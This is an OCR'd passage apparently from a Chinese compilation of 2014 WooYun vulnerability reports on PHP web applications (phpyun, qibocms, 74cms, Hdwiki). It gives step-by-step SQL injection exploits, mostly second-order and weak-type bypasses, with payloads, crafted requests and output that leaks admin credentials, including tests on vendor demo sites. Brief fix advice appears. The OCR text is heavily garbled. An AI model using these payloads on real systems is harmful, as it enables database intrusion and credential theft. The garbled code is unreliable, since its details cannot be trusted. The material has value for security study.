if($_POST['num']<1){ // 这 里 比较 是 否 小 于 1 php 弱 语言 像 lasdxx 都 能 过 。 
$this->obj->ACT_layer_msg ("请 卉 写 正确 的 数量 1 ",8,: 
selse{ 
if ($_COOKIE[ 'usertype' ]=="1"){ 
$table="member_statis"; 
jelseif($ COOKIE['usertype']-z"2")( 
$table-"company. statis"; 
jelseif($ COOKIE['usertype']-z"3")( 
$table-"lt statis"; 
jelseif($ COOKIE['usertype']-z"4")( 
$table-"px train statis"; 
j 
$info-$this-»0bj-»2DB select once($table," uid - 
$gift=$this->obj->DB_select_once("reward"," .id 
if($_POST['num']>$gift['stock']){、// 这 里 第 二 处 比 
这 里 的 库存 为 100\. 发 现 如 果 我 传递 的 num 为 lasd 之 类 的 时 候 3tb/Rtrue f » » 那么 就 
$this->obj->ACT_layer_msg(" 已 超出 库存 数量 1"， 
jelse( 
if(S$gift['restriction']!-"o"&&$ POST['num'' 


$this-»0bj-»ACT layer_msg(" 已 超出 限购 数量 


jelse( 





it PHP 常见 漏洞 





INT Y| = ẹ SRL? XSS- Encryption" Encodiner Other” 
4s) Load URL http: //web/web/phpyunl226/ index. php?m-2redeem&c-dh&i d=1 
Q^ split URL 





Enable Post data [ | Enable Referrer 














Post data submi t=x&passwor d=xi aoyux#]inkman=x@linktel=xénum=1 asdasdhs 
bool (true) 

4s) Load URL http: //web/web/phpyunl226/ index. php?m-2redeem&c-dh&i d=1 

Ü spit URL 





Enable Post data  [ | Enable Referrer 
Post data 





submit-xé&password-xiaoyuxélinkman-xélinktel- 





&num-1tlsdasd&$afekey-el alb: 
i 








bool (false) 


那么 我 们 就 能 绕 过 这 个 判断 了 。 


LAI 大 加 最 多 | | EasyTalk Administras E 390sec 信 号 实生 小 中 QN Exploit-DBumiSIZ4U | | EasyTalk Administra" Eg] 133TDay | ;90secTools |S 
INT wc $ SQL XSS- Encryptiony Encoding: Other” 
c Load URL 

















http: //web/web/phpyunl226/ index. php/ admin/?m-redeem&c-dh&i d=1 
Ü split URL 


) Execute 





[v] Enable Post data [] Enable Referrer 
Post data 





submi t-xépassword-xiaoyu&linkman-xélinktel-x&num-itl, name= (select concat (username, 0x23, password) from 
phpyun_admin_user )hsafekey=el al b4950a49e9fe0ch3bb0e3 f600e95 











UPDATE phpyun_reward SET stock = stock -1+1,name=(select 
concat(username,0x23,password) from php_admin_user) WHERE id ='1' 


此 时 执行 的 语句 
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ib PHP 常见 漏洞 





INT v| œ $ SAL” XSSr Encryption: Encoding: Üther- 
w) Load URL http: //web/web/phpyunl226/ index. php?m-redeem&c-show&i d=1 
Ü Split URL 

>) Execute 














剩余 库存 数量 ，100 件 (已 兑换 0 fH) 
这 里 随便 说 一 下 补丁 解决 泄 汤 key 的 那个 方法 太 漆 了 把 。。 


很 轻松 的 就 绕 过 去 了 。 这 里 不 多 说 ， 简 直 。。 


第 二 处 在 apilalipay\alipayto.php 


require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config. | 
require_once(dirname(dirname(dirname(__FILE__)))."/data/db.safety. | 
require_once(dirname(dirname(dirname(__FILE__)))."/plus/config.php' 
require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.c- 
$db = new mysql($db config['dbhost'], $db config['dbuser'], $db_cor 
if(!is_numeric($_POST[ 'dingdan' ] ) ){die;} 

$ COOKIE['uid']-(int)$ COOKIE['uid']; 

$ POST['is invoice']-(int)$ POST['is invoice']; 

$ POST['balance']-(int)$ POST['balance']; 

$member sql-$db-»-query("SELECT * FROM ~".$db_config["def"]."member 
$memberzmysql fetch array($member sql); 

if($member['username'] != $_COOKIE['username'] || $member['usertyp« 


echo ' 登 录 信 息 验 证 错误 ， 请 重新 登录 1 'sdie; 
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$sql=$db->query("select * from ~".$db_config["def"]."company_order 
$row-mysql fetch array($sql); 


if('$row['uid'] || $row['uid']!-$ COOKIE['uid']) 


die; 


if((int)$ POST['is invoice']--'i1'&&$config["sy com invoice"])( 
$invoice title=", is invoice -'".$ POST['is invoice']."'"; 
if ($_POST['linkway']=='1'){ 
$com_sql=$db->query("select ‘linkman , linktel', address 1 
$company=mysql_fetch_array($com_sql); 
$link-",'".$company['linkman']."','".$company['linktel']." 
$up_record=", link man' -'".$company['linkman']."', link mol 
selse{ 
$link=",'".$ POST['link man']."','".$ POST['link moblie'].' 
$up_record=", link man' -'".$ POST['link man']."', link mob. 
} 
$record_sql=$db->query("select ` id from ~".$db_config["def"].' 
$record=mysql_fetch_array($record_sql); 
if($record['id']){ 


$upr_sql=$db->query("update "".$db config["def"]."invoice ! 


mysql fetch array(S$upr. sq1); 





可 以 看 到 data/db.safety.php 把 过 滤 文 件 添 加 进来 了 。 
那么 这 里 的 $_POST 我 们 就 不 能 引入 单 引 号 了 。 


但 是 。。 


if($_POST['linkway']=='1'){ 
$com_sql=$db->query("select ^linkman' , linktel' , address 1 
$companyzmysql fetch array($com sq1); 
$link-",'".$company['linkman']."','".$company['linktel']." 
$up_record=", link man -'".$company['linkman']."', link mol 
jelse( 
$link=",'".$ POST['link man']."','".$ POST['link_moblie'].' 


$up_record=", link man -'".$ POST['link man']."', link mob. 


BN __# 
首先 编辑 自己 的 企业 信息 把 safekey 加 进去 。 





")Live HITP Replay 











POST v| http: //web/web/phpyunl226/member/index. php/ admin/?c=infobact=save 
HTTP Headers 


Host: web ^ 

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 

Accept: text/html, application/xhtmltxml, application/xml; q=0. 9, */*; q70. 8 

Accept-Language: zh-en, zh; q70. 8, en-us; q70. 5, en; q-0. 3 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Referer: http: //web/web/phpyunl226/member/index. php?c=info 

Cookie: ECS[visit_times]=6; themeIndexTom=2; KT-GUID-KT- 

CSDDTSCS69SEA5S25535706602C6136C; KT-ADMIN-admin; 1Teplastvisit=1418373539; 

lTeplastactivity-Ü0; |^ utma=242460388. 119574638. 1418373557. 1418373557. 1418373557. 1; 
utmz-242480388. 1418373557. 1.1. utmcen= (direct) lutmesr= (direct) lutmemd= (none): M 




















Send POST Content ? 


A E EE 11538186919812*r'in ^ 
Content-Disposition: form-data; name-" address" rin 

irin 

yu union select xx from\r\n 

TD A 11538186919912\rin 

Content-Disposition: form-data; name-"safekey"Ar'in 

trin 

f213ae15d14ba9de59934fdfbe3ebTOf\r in 

EXER eR 11538186919912\rin 

Content-Disposition: form-data; name="hy“irin z 
Sein — 


Content-Length: 237T 











这 里 我 直接 把 语句 数 出 来 了 。 


论 PHP 常见 漏洞 





qu] Load URL | http: //web/web/phpyunl226/api/alipay/alipayto. php| 
Ü Split URL 
5», Execute 





[V] Enable Post data [] Enable Referrer 


Post date dingdan=1151321321514i s_invoi ce=1@1inkway=1 

















insert into phpyun invoice record (order_id, uid, ti 


ink moblie , address ) 
values(’’,’1’,’’,’ 0°,’ 1419095579", ’ c^, ' 13594589655’ 


estatus addtime; akman 
, yu union select xx from ) 


漏洞 十 明 


INT v| œ $ SQLr XSS- Encryption: Encoding: Otherr 
三 Load URL http: //web/web/phpyunl226/ index. php?m-redeem&c-show&i d=1 


Ü Split URL 





») Execute 





a 
An KIF MAA RHE RH ”企业 黄页 ”职场 资讯 ”招聘 会 ”工具 箱 


© 您 当前 的 位 置 : 首页 > 积分 商城 >admin#21232f297a57a5a743894aDe 


admin#21232f297adfada743894a0e 





所 需 积 分 ，0 积 


剩余 库存 数量 ，100 件 (BRIM o 件 ) 
修复 方案 


第 一 个 用 pylode 
第 二 个 对 出 库 的 addslashes 一 次 。 
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WooYun-2014-80877 : qibocms 地 方 门 户 系 统 二 
次 注入 #5(demo 测 会 ) 


e 
—— MÀ 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-080877 


简要 描述 


二 次 注入 。 


详细 说 明 
在 hy/member/homepage_ctrl/pic_fm.php 中 


if(count($pids)<1) showerr(" 请 选择 一 张 图 片 ")， 
if(!$psid) showerr(" 请 指定 一 个 图 集 " ); 
foreach($pids as $pid){ 
if ($pid) { 
$rt=$db->get_one("SELECT url FROM ($ prejpic WHERE pid='$p: 
$db->query("UPDATE {$_pre}picsort SET faceurl='$rt[url]' Wt 


break; 





入 库 的 地 方 手 多 随便 找 一 处 把 


在 hy/member/homepage_ctrl/pic_upload.php 中 


foreach($photoDB[url] AS $key=>$value) { 

if(teregi("\.(gif|jpg|jpeg|png|bmp)$", $value) ){ 
delete_attachment($uid, tempdir($value) ) ;// 限 定 结尾 必须 jp' 
continue; 

j 

$picpath = "homepage/pic/".ceil($uid/1000)."/"; 

$picurl = $picpath.basename( $value) ;//basename 4 # "A 

move_attachment($uid, tempdir ($value), $picpath); // BY 4? 

if(!is_file(ROOT_PATH. "$webdb[updir ]/$picurl") ){ 
$picurl=$value; 

j 

$Newpicpath-ROOT PATH."$webdb[updir]/($picurl]).gif"; 

gdpic(ROOT PATH."$webdb[updir]/$picurl",$Newpicpath,150,415( 

if(!is file($Newpicpath))( 
copy(ROOT_PATH."$Swebdb[updir ]/{$picurl1}", $Newpicpath); 

j 

$title = filtrate($photoDB[name][$key]); 

$title = get_word($title, 32); 

//echo "INSERT INTO ^($ pre)pic' (^psid' , "uid' , "usernar 

$db->query("INSERT INTO ^[$ prejpic' (^ psid' , "uid' , "ust 

$ck++; 

a] Be 


HAE. 





论 PHP 常见 漏洞 





4m] Load URL http: //12T. 0. 0. 1/dan/gibod£/hy/member/homepage ctrl.php?atn-pic upload$step-28psid-l&photoDB[url][]-xx'. jpg | - 
Ü Split URL + 








» Execute 





[C] Enable Post data [| Enable 
INSERT INTO qb hy pic (psid , uid , 
a orderlist’ ) VALUES C1', °1’, 'xiaoyu', 








网 页 正在 跳 转 当中 , WMR... 
成 功 上 传 1 张 图 片 ! 


JUL 


oO 


MAREN AGA BRE, 请 点 击 这 里 





转 义 入 库 。 然后 





Aim m P DaL7 ASOT encryption” Znhcoalngr wtnery 
三 Load URL http: //12T.0. 0. 1/dan/gibod£/hy/member/homepage ctrl.php?atn-pic, fm&pids[]-41Bpsid-3313 = 
Ü Split URL + 
>) Execute 








[C Enable Post data [ Enable Referrer 
AEREE: UPDATE qb hy picsort SET faceurl-'xx'. jpg’ WHERE psid=’ 3313’ AND uid?’ 1” Al 





> 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”. jpg’ 
WHERE psid-'3313' AND uid-'!'' at line | 
1064 


BE 导致 注入 。 
构造 一 下 。 


ini vj = 可 oL” ADOT Zncrypr1onr Zncoalngr utner” 





(e) Load URL http://127.0.0. 1/dan/qibodf/hy/member/homepage_ctrl. php?atn=pic_upload&step=24psid=14photoDB[url][]=yu’ and (select 1 from (select = 


count (k), concat ((select user ()), floor (rand (0)#2))x from information schema. tables group by x)a)823. jpg 
Ü Split URL + 


^) Execute 





[C Enable Post data [ ] Enable Referrer 
INSERT INTO qb hy pic ( psid , uid , username , title , url , level’ , yz ,  posttime , isfm ,  orderlist ) VALUES (1’, ° r, 
'xiaoyu', '', 'yuV and (select 1 from (select countí(x),concat((select user(),floor(rand(0)*2))x from information schema.tables group by 
x)a)t.jpg', '0', '!', '1414316282', '0', "0" 








网 页 正在 跳 转 当中 , ER. . . 
成 功 上 传 1 张 图 片 ! 
如 果 您 的 浏览 回 没 有 自动 跳 转 , 请 点 击 这 里 








转 义 入 库 这 里 我 把 语句 输出 一 下 。 
然后 出 库 。 


/hy/Mmember/homepage ctrl.php?atn-pic fm&pids[]-45&psid-3313 
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t PHP 常见 漏洞 





http: //12T. 0. 0. 1/ dan/gqibod£/hy/member/homepage ctrl.php?atn-pic, fm&pids[]-458psid-3313 














6 438 : UPDATE -— hy picsort SET faceurl-" yu’ and (select 1 from (select count (*), concat ( (select 


E user ()), floor (rand(0)*2))x from 
information_schema.tables group by x)a)#. jpg’ WHERE psid= 3313” AND uid="1’ 


Duplicate entry 'rootGlocalhostl' for key 'group key 
1062 








网 页 正在 跳 转 当中 , WME... | 
设置 成 功 
如 果 您 的 浏览 器 没有 自动 跳 转 , 请 点 击 这 里 








demo 测试 : 





4m) Load URL lifeS. qibosoft. com//hy/member/homepage ctrl.php?atn-pic, uploadéstep-2&psid-1&photoDB[url][]-yu' R23. jpg 
Ü split URL 
+) Execute 








[C] Enable Post data  [ ] Enable Referrer 








REGRESS, WHR... 
成 功 上 传 1 张 图 片 ! 
如 果 您 的 训 览 器 没有 自动 跳 转 , 请 点 击 这 里 





入 库 
出 库 


q) Load URL 


life5. gibosoft. com/hy/member/homepage_ctrl. php?atn=pic_fmépids[]=264psi d=3313 
d split URL 


J) Execute 





[C] Enable Post data [| Enable Referrer 


数据 库 连 接 出 错 :UEDATE life5 hy picsort SET faceurl=’ yu’ and (select 1 from (select count (X), concat ((select user ()), floor (ran: 
group by xJa)#. jpg WHERE psid-'3313' AND uid= 1’ 





构造 一 下 可 以 看 Update 哪个 column 出 数据 的 。 


漏洞 证 明 
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论 PHP 常见 漏洞 





qm) Load URL http: //127. 0. 0. 1/dan/qibod£/hy/member/homepage ctrl.php?atn-pic fm&pids[]-458psid-3313 














ef Has: UPDATE qb hy picsort SET faceurl-'yu' and (select 1 from (select count (*), concat ({select user()),floor(rand(0)*2))x from 


information schema.tables group by x)a)#. jpg? WHERE psid= 3313! AND uid="1’ 


Duplicate entry 'rootGlocalhostl' for key 'group key 
1062 








网 页 正在 跳 转 当中 , WME... 
设置 成 功 
如 果 您 的 浏览 器 没有 自动 跳 转 , 请 点 击 这 里 
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WooYun-2014-68362 : 74cms (20140709) 二 枚 二 
次 注入 


V 
漏洞 作者 : UN 


来 源 : http://www.wooyun.org/bugs/wooyun-2014-068362 


简要 描述 


不 好 好 的 通过 修改 造成 漏洞 的 代码 而 是 通过 修改 过 滤 函 数 。 现 在 的 过 滤 函 数 , 虽然 
我 是 绕 不 过 去 了 。 但 是 还 是 能 找到 几 处 能 出 数据 的 。 之 前 未 通过 ,这 次 两 个 打 个 包 


P.S: 这 很 不 好 意思 之 前 测试 demo 的 时 候 因为 有 个 是 个 update 的 点 忘记 加 Where 限 
制 条 件 了 导致 给 某 处 全 部 都 出 数据 了 。。。。。 不 只 应 该 修改 过 滤 函 数 ,而 且 也 应 
该 在 造成 漏洞 的 代码 好 好 的 修复 一 下 。 

详细 说 明 

第 一 枚 。 第 一 枚 就 不 分 析 代 码 了 。 

首先 注册 一 个 企业 会 员 然后 创建 企业 


欢迎 xiaoyux 登录 | [BRAD] DRH] 


s EI 


首页 “招聘 信息 Ae RES HRIS# ”黄页 “新 闻 资 计 





当前 位 置 ， 首页 >> 会 员 中 心 >> 公司 信息 , >> 基 本 信息 





心 首 5) 企业 基本 信息 
职位 管理 * 公 司 名 称 ， | XXXXXXXXXXXX 
发 布 职 和 位。 ”职位 管理 * 企 业 性 质 ， | 国企 


招聘 管理 = "Wüste. | 计算 机 软件 /硬件 “www.wooyun.org 


单 引 号 会 被 转 义 然后 转 义 入 库 。 


论 PHP 常见 漏洞 


找 找 出 库 的 地 方 。 
创建 好 企业 后 发 布 招聘 如 下 。 





awe RES ”HR 工具 夭 





当前 位 置 ， 首 页 >> 会 员 中 心 >> 职位 管理 >> 发 布 职位 


发 布 职位 











[TI FER - 

职位 管理 * 职 位 名 称 ， | asdad 

发 布 职位 。 职位 管理 * 性 别 要 求 ， @ 不 限 OF OX 

招聘 管理 - "ROA: e 全 职 © 兼职 。 © 实习 

MEAT 已 下 载 和 BER. © 不 允许 © 允许 

IRRA EX, [6] 

umRr 1 bh [- t ~ 4:MNW.Wooyun.org 

Ææ LoadURL http://web.com/web/74cms/user/company/company_jobs.php?act=addjobs_save 
Split URL + 
» Execute 





[E] Enable Post data | | Enable Referrer 











Error: Query error:INSERT INTO qs_jobs C setmeal deadline. , add mode, “uid, 
companyname `, company id, company addtime : company. audit , ' jobs name , ‘contents , 
“nature, nature cn, sex, sex cn, amount, category, ciao "category cn ， 
“trade, ^ trade cn , ‘scale, scale cn , et ‘sdistrict , district cn, tag, 
“street , street cn ， ‘officebuilding , ‘officebuilding_cn , “education , ^ education cn , 
“experience, ' experience cn , wage , wage cn, “graduate, addtime , deadline , 
“retreshtime , key, subsite id, i map_ x, mapy, audit ) VALUES (0°, "Y, 





73’, "xxxxxxxxxxxx 7, 73’, 7 1405230269 |, '0', 7 asdad’, 

" adsadaasdasdaadsadaasdasdadasdasdaadsadaasdasdadasdasdaadsadaasdasdadasdasdaadsadaasdasdada 
， 全 职 ， 3. gn "b. ls. 2 ”经营 管 理 类 /营销 S ， T, ”计算 机 软件 /硬件 ， 

“81 7 20-99", "or," ARTT, T 0,’ Oa a QU. “不 限制 ， 0 AR 

ER. "56, " eoin An x BO y 1405230386, ° 1406526386" 1405230386 ”asdad0 

xxxxxxxxxxxx” 经 营 00 管理 00 营销 00 营销 总 监 总 监 00 北京 00 北京 市 0 ， mr, 7, Po ve dli 


www.wooyun.org 


点 击发 布 后 可 以 看 到 报错 了 。 这 里 刚才 的 企业 名 出 库 了 而 且 带 入 到 了 查询 当中 。 


这 里 稍微 构造 下 还 是 能 出 数据 。 这 个 咋 出 数据 就 不 多 说 了 , 第 二 处 再 来 说 说 出 数 
dE o 





第 二 处 

与 上 个 不 同 的 是 这 个 是 注册 一 个 个 人 会 
后 发 布 简历 。 

来 看 代码 


在 user/personal/personal_resume.php 中 
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elseif ($act=='make4_save' ) 


{ 


Be 


$resume education-get resume education($ SESSION['uid'],$ REQUE 
if (count($resume education)»-26) showmsg(' 教 育 经 历 不 能 超过 6 条 |!',1 
$setsqlarr['uid']=intval($_SESSION['uid']); 

$setsqlarr['pid']-intval($ REQUEST['pid']); 

if ($setsqlarr['uid']==0 || $setsqlarr['pid']==0 ) showmsg(' #4 
$setsqlarr['start']-trim($ POST['start'])?$ POST['start']:showr 
$setsqlarr['endtime']-trim($ POST['endtime'])?$ POST['endtime'' 
$setsqlarr['school']=trim($_POST['school'])?$_POST[ 'school']:st 
$setsqlarr['speciality']-trim($ POST['speciality'])?$ POST['sp« 
$setsqlarr['education']-trim($ POST['education'])?$ POST['educ: 
$setsqlarr['education cn']-trim($ POST['education cn'])?$ POST| 

if (inserttable(table('resume education'),$setsqlarr)) 


( 


check resume($ SESSION['uid'],intval($ REQUEST['pid']). 





inserttable(table(resume education") 

这 里 把 post 来 的 数据 带 入 到 了 insert 当 中 入 库 。 

这 里 我 们 提交 一 个 单 引 号 然后 带 入 insert 的 时 候 虽 然 是 转 义 
但 是 入 库 后 会 消除 转 义 符 。 


然后 继续 看 check_resume 


function check_resume($uid, $pid) 


{ 


global $db, $timestamp, $_CFG; 


$uid=intval($uid); 


$pid=intval($pid); 

$percent-0; 

$resume basic-get resume basic(S$uid,S$pid); 

$resume intention-$resume basic['intention jobs']; 
$resume specialty-$resume basic['specialty']; 
$resume education-get resume education(S$uid,S$pid); 
if (!empty($resume_basic) )$percent=$percent+15; 

if (!empty($resume_intention) )$percent=$percent+15; 
if (!empty($resume specialty))$percent-$percent-415; 
if (!empty($resume_education) )$percent=$percent+15; 
if ($resume basic['photo img'] && $resume_basic['photo_audit' ]- 
{ 


$setsqlarr['photo' ]=1; 


else 


$setsqlarr['photo' ]=0; 
} 
if ($percent<60) 


{ 
$setsqlarr['complete percent']-$percent; 


$setsqlarr['complete']-2; 


else 


$resume work-get resume work($uid,$pid); 


$resume training-get resume training(S$uid,$pid); 


$resume photo-$resume basic['photo img']; 

if (!empty($resume_work) )$percent=$percent+13; 

if (!empty($resume_training) )$percent=$percent+13; 

if (!empty($resume_photo) )$percent=$percent+14; 
$setsqlarr['complete' ]=1; 

$setsqlarr['complete percent']-$percent; 

require once(QISHI ROOT PATH.'include/splitword.class.php': 
$sp - new SPWord(); 

$setsqlarr['key']-$resume basic['intention jobs'].$resume I 
$setsqlarr['key']="{$resume_basic['fullname']} ".$sp-»extr: 
$setsqlarr['key']zstr replace(","," ",$resume basic['inten!t 
$setsqlarr['key']=$sp->pad($setsqlarr['key']); 


if (!empty($resume_education) ) 


{ 
foreach($resume_education as $1i) 
{ 
$setsqlarr['key']="{$1i['school']} {$setsqlarr['key']} 
} 
} 


$setsqlarr['refreshtime' ]=$timestamp; 
} 
updatetable(table('resume'),$setsqlarr, "uid='{$uid}' AND id="{: 


updatetable(table('resume_tmp'),$setsqlarr, "uid='{$uid}' AND ic 
ee 





$resume_education=get_resume_education($uid,$pid); 
这 里 把 刚才 入 库 的 查询 了 出 来 所 以 单 引 号 就 出 来 了 。 继续 看 。 


$setsqlarr['key']-$resume basic['intention jobs'].$resume basic['r« 
$setsqlarr['key']-2"($resume basic['fullname']?) ".$sp-»extr: 
$setsqlarr['key']zstr replace(","," ",$resume basic['inten!t 
$setsqlarr['key']-$sp-»pad($setsqlarr['key']); 


if (!empty($resume_education) ) 


{ 
foreach($resume education as $1i) 
{ 
$setsqlarr['key']="{$1i['school']} {$setsqlarr['key']} 
} 
} 


$setsqlarr['refreshtime' ]=$timestamp; 
} 
updatetable(table('resume'),$setsqlarr,"uid='{$uid}' AND id="{: 
updatetable(table('resume_tmp'),$setsqlarr, "uid='{$uid}' AND ic 
E = m 
然后 把 出 库 来 的 给 一 数组 然后 带 入 到 了 update 中 。 





造成 了 注入 。 而且 这 个 update 可 以 控制 的 点 是 在 set 位 置 的 
所 以 可 以 是 我 们 想 update 这 table 里 面 的 什么 就 Update 什么 。 


it PHP 常见 漏洞 


填 加 教育 经 历 
* 开 始 日 期 | 2018 年 8 月 (hp. 20034E8 A) 


ate BG, [20187A (m 20064F6 A) 
meee: fed 
ewe [a 
seem. fe 


ee | | mse | Ww 汉阳 by 而 orb 


©] Enable Post data | | Enable Referrer 








yY Care 
































Error: Query error:UPDATE qs resume SET photo - 0, ‘complete F? 1’, 
"complete percent = 60', “key = 一 aa asda’ asd’ as? 大堂 /前 厅 经 理 b'000 大 堂 00 前 厅 00 前 厅 经 
理 经 理 00 高 中 00 x’ xx! asdad a’, refreshtime =’ 1405231090’ WHERE uid? 2’ AND id=’ 2’ 


www.wooyun.org 
报错 了 稍微 构造 一 下 。 
这 里 我 们 把 address updata 成 要 出 的 数据 


填 加 教育 经 历 


* 开 始 日 期 ， [201885 — — (m 20034F8 A) 
ARAR: [201875 Qn 200646 A) 
* 学 校 名 称 ， [yu , addresssuserO# | 
uc [a 


* 选 择 学 历 ， 


mj 
gn: 
E 





RIF | | -返回 上 一 步 


~ WWW.Wooyun.org 
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伦 


& PHP 常见 漏洞 


SA: 高 中 工作 经 验 ， 无 经 验 浏览 ，3 次 


基本 信息 
真实 姓名 ;| asdada 
年 龄 : |59% 


婚姻 状况 :未婚 


最 高 学 历 : 中 
联系 地 址 :root@localhost 


MTSE]: | 2014-07-13 





成 功 了 对 关键 字 的 过 滤 出 数据 。 
测试 了 一 下 demo 也 成 功 





46) Load URL http://demo.74cms.com/resume/resume-show-6271.htm| 


4 





Split URL 


TERI: 
身高 : 
户籍 所 在 : 
工作 经 验 ， 
浏览 次 数 ， 
简历 等 级 


3 
未 知 
adasdas 
无 经 验 
3 次 


普通 


www.wooyun.org 




















©] Enable Post data | | Enable Referrer 














骑士 人 才 系 统 thittpsiderno.74ems.com) 


王 军 的 个 人 简历 
更 新 日 期 2014-05-30 
学 历 : 本 科 工作 经 验 : 3 年 浏览 : 30 次 


基本 信息 
真实 姓名 : == 
年 龄 : 267 
婚姻 状况 : | 未婚 





刷新 时 间 : | 2014-05-30 


E Aword 

性 别 : | 男 

Sm: | 185CM 
户籍 所 在 : | 上 海 
工作 经 验 : (ME 
浏览 次 数 : SR 
简历 等 级 : He 


http://**.**.**.**/resume/resume-show-6271.htm 


漏洞 十 明 


见 上 面 。 


A ~ oe 
修复 方案 


真 的 应 该 好 好 的 修改 代码 而 不 是 光 修 改过 滤 函 数 。 


对 于 这 种 二 次 注入 由 于 入 库 的 时 候 只 会 调用 一 次 stripcslashes 
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py a 
^ A 2 ^ 
f. AN 


~ WWW.wooyun, org 


230 


74cms 做 了 全 局 转 义 的 如 果 再 转 义 一 次 那么 就 算 入 库 也 会 含有 转 义 符 了 。 自然 出 
库 也 有 了 。 


或 者 就 是 在 出 库 之 后 再 addslashes 一 次 都 行 。 


WooYun-2014-67424 : Hdwiki 最 新 版 二 次 注入 一 
A 


" 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-067424 


简要 描述 

上 Hdwiki 官 网 发 现 更 新 日 期 一 直 都 没 变 。 还 以 为 一 直 都 没 更 新 了 , 结果 今天 下 载 一 
个 下 来 看 看 。 发 现 之 前 发 的 洞 竟然 都 补 掉 了 。 

非 育 注 直接 出 数据 。 

ps. 更 新 程序 了 应 该 还 是 把 日 期 更 新 了 一 下 要 不 别人 会 一 直 以 为 没 更 新 的 。 


详细 说 明 
在 user/pms.php 中 


function doblacklist(){ 
if(isset($this->post['blacklist'])){ 
$blacklist = htmlspecialchars(string::stripscript($thi: 
if(empty($blacklist))( 
$result = $ ENV['pms']-»remove blacklist($this-»us: 
selse{ 


$result = $ ENV['pms']-»add blacklist($blacklist, $1 


EJ $ 


add_blacklist($blacklist,$this->user['uid']); 





$blacklist = htmlspecialchars(string::stripscript($this->post['blacklist']) 
post 都 会 转 义 的 。 来 看 看 这 函数 stripscript 


function stripscript($string) { 
$pregfind=array("/<script.*>.*<\/script>/siU", '/on(error |m 
$pregreplace-array('','',); 
$string-preg replace($pregfind,S$pregreplace,S$string); 


return $string; 





这 是 过 滤 了 一 些 xss 常 用 的 。 


function add_blacklist($blacklist, $uid) { 


return($this->db->query("REPLACE INTO ".DB_TABLEPRE."black- 


— — E] 





E | 
然后 直接 入 库 , 虽然 转 义 了 但 是 转 义 后 入 库 之 后 转 义 符 会 被 消除 的 。 

来 看 看 哪里 出 库 了 。 

依 昌 在 control/pms.php 中 


function dobox(){ 
$this->get[3] = empty($this->get[3]) ? NULL : $this->get[3_ 
$page = max(1,isset($this->get[4]) ? $this->get[4] : $this- 
$num = isset($this-»setting['list prepage'])?$this-»settint 
$start_limit = ($page - 1) * $num; 


$count = $ ENV['pms']->get_totalpms($this->user['uid'], $tl 
> 





function get_totalpms($uid, $type, $group=''){ 
$sqladd = ''; 
if($type == 'inbox'){ 
$blacklist = $this->get_blacklist($uid); 
if($blacklist == '[ALL]'){ 
return '0'; 
selse{ 


$blackuser = str_replace(",","','",$blacklist); 


if ($group) { 
$sqladd = ($group == 'owner') ? 'AND og-0' : '/ 
j 
$query = "SELECT COUNT(*) num FROM ".DB TABLEPRE. "| 
j 
selse{ 
$sqladd = ($type == 'outbox') ? 'drafts!=1' : 'drafts=: 


$query = "SELECT COUNT(*) as num FROM ".DB TABLEPRE. "pr 


} 
$total = $this->db->fetch_first($query); 


return $total['num']; 





$blacklist = $this->get_blacklist($uid); 


function get_blacklist($uid) { 


$user = $this->db->fetch_first("SELECT blacklist FROM ".DB 


return $user['blacklist']; 








这 里 把 刚才 入 库 的 查询 了 出 来 成 功 引入 了 单 引号 。 


$blackuser = str replace(",","','",$blacklist); 
if ($group) { 
$sqladd = ($group == 'owner') ? 'AND og-0' : '/ 
j 


$query = "SELECT COUNT(*) num FROM ".DB TABLEPRE."[ 
4 — JR 





然后 查询 出 来 后 赋值 给 $blackuser 然后 带 入 了 查询 当中 ， 而 且 在 最 后 
return $total['num']; 

return 回 来 后 直接 $this-»view-»assign('count',$count); 输出 来 。 

就 可 以 直接 出 数据 。 

$blackuser = str_replace(",","","",Sblacklist); 


在 这 里 会 把 过 号 替换 然后 就 不 用 过 号 来 注入 把 。 


漏洞 证 明 


A FH 


admin ) union select user() order by num desc# 


杖 加 到 该 列表 中 的 用 户 给 您 发 送 短 消息 时 将 不 予 接 收 
添加 多 个 忽略 人 员 名 单 时 用 英文 逗号 “, ” 隔 开 ， 如“ 张 三 , 李 四 , EH’ 
如 需 禁 止 所 有 用 户 发 来 的 短 消息 ， 请 设置 为 [ALL]”。 注 意 :[ALL] 不 要 和 其 他 名 单 


E 
| 提交 | www.wooyun.org 
首先 在 忽略 列表 里 面 添加 这 样 的 语句 
然后 访问 
x) Load URL http://web.com/web/hdwiki/index.php?prns-box-inbox 
Q Split URL 
» Execute 


[E] Enable Post data | | Enable Referrer 





收 件 箱 





[私人 消息 | | 系统 消息 | 
Co E 来 自 时 间 


[删除 ] ? 共有 短 消息 : root@localhost MA: 
root@localhost 系统 : 0， 短 消息 上 限 : 200 








直接 出 数据 。 


修复 方案 
转 义 一 下 。 


EMD 给 个 20 分 把 。 


论 PHP 常见 漏洞 


WooYun-2014-60166 : AA F ARSQLIEA > 4 
过 WAF 


漏洞 作者 : WIRT 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-060166 
简要 描述 

云 人 才 系 统 SQL 注 入 ， 绕 过 WAF 

详细 说 明 

云 人 才 系 统 SQL 注 入 ， 绕 过 了 360 的 WAF~~ 


首先 需要 注册 一 个 普通 用 户 ~ 


比如 官方 演示 站 点 : 


QE "usc 








P. uncom 4 
LX 系统 | 专业 的 人 + 招聘 平台 





管理 简历 我 的 职位 管理 其 他 管理 


快速 号 航 : ”邀请 信息 | 公司 黑 名 单 | 公司 足迹 | 我 关注 的 人 | 基本 信息 | 申请 职位 管理 | 简历 管理 | i 


〇 账户 信息 基本 信息 管理 照片 管理 
£t * 姓 名 : nik 


«Ha x 


* 出 生年 月 : 1988-01-06 - 


iB ERE RU PUES WWW.Wooyun.org 


然后 来 到 
http://**.**.**.**/member/index.php?M=index&C=info 
可 以 看 到 有 某 数字 的 WAF : 
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ib PHP 常见 漏洞 


@ www hr135com/member/indexphp?M=index&C=ino — — (— QB mec 国 -se 





输入 内 容 存 在 危险 字符 ， 安 全 起 见 ， 已 被 本 站 拦截 


返回 上 一 页 








www.wooyun.org 


于 是 我 们 发 现代 码 如 下 : 
